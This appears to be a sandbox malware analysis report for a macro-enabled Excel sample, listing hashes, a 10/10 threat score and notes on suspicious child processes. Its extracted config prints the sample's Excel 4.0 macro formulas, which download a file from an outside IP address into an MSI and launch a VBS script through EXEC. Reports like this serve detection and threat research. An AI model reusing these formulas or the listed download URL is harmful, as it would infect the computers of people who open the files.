General
-
Target
02ba7af2b1f329f69e40013e632351a4
-
Size
6KB
-
Sample
231221-1lgfvaaef9
-
MD5
02ba7af2b1f329f69e40013e632351a4
-
SHA1
731a6a36dbcffa54bb8ffdd5130ea09f949500d2
-
SHA256
af2b0cffbce089974e65b93e8ff6f1f5dfc9503f670d069eb1cdf4d4a17e8644
-
SHA512
83b1969038bd81482b12599f02a2108f2bef3c7574f4f6dff78787d442314ea4943f0e15898844f9ed9a8f30a55beba5d30fdb0d60c8f25ae5e970bff52c7c4a
-
SSDEEP
192:NDSeuScbrA2OmmfRv8UhHFBFYuBb98yW++Bd:NJupM2w11FY8b98yWFd
Static task
static1
Behavioral task
behavioral1
Sample
02ba7af2b1f329f69e40013e632351a4.xlsm
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
02ba7af2b1f329f69e40013e632351a4.xlsm
Resource
win10v2004-20231215-en
Malware Config
Extracted
http://46.17.98.187/index.php
http://google.com/index.php
-
formulas
=CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://46.17.98.187/index.php","C:\~\pes.msi",0,0) =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://google.com/index.php","C:\~\pes.msi",0,0) =EXEC("wscript C:\zer\spp.vbs") =HALT()
Extracted
http://46.17.98.187/index.php
http://google.com/index.php
Extracted
http://46.17.98.187/index.php
Targets
-
-
Target
02ba7af2b1f329f69e40013e632351a4
-
Size
6KB
-
MD5
02ba7af2b1f329f69e40013e632351a4
-
SHA1
731a6a36dbcffa54bb8ffdd5130ea09f949500d2
-
SHA256
af2b0cffbce089974e65b93e8ff6f1f5dfc9503f670d069eb1cdf4d4a17e8644
-
SHA512
83b1969038bd81482b12599f02a2108f2bef3c7574f4f6dff78787d442314ea4943f0e15898844f9ed9a8f30a55beba5d30fdb0d60c8f25ae5e970bff52c7c4a
-
SSDEEP
192:NDSeuScbrA2OmmfRv8UhHFBFYuBb98yW++Bd:NJupM2w11FY8b98yWFd
Score10/10-
Process spawned unexpected child process
This typically indicates the parent process was compromised via an exploit or macro.
-
Process spawned suspicious child process
This child process is typically not spawned unless (for example) the parent process crashes. This typically indicates the parent process was unsuccessfully compromised.
-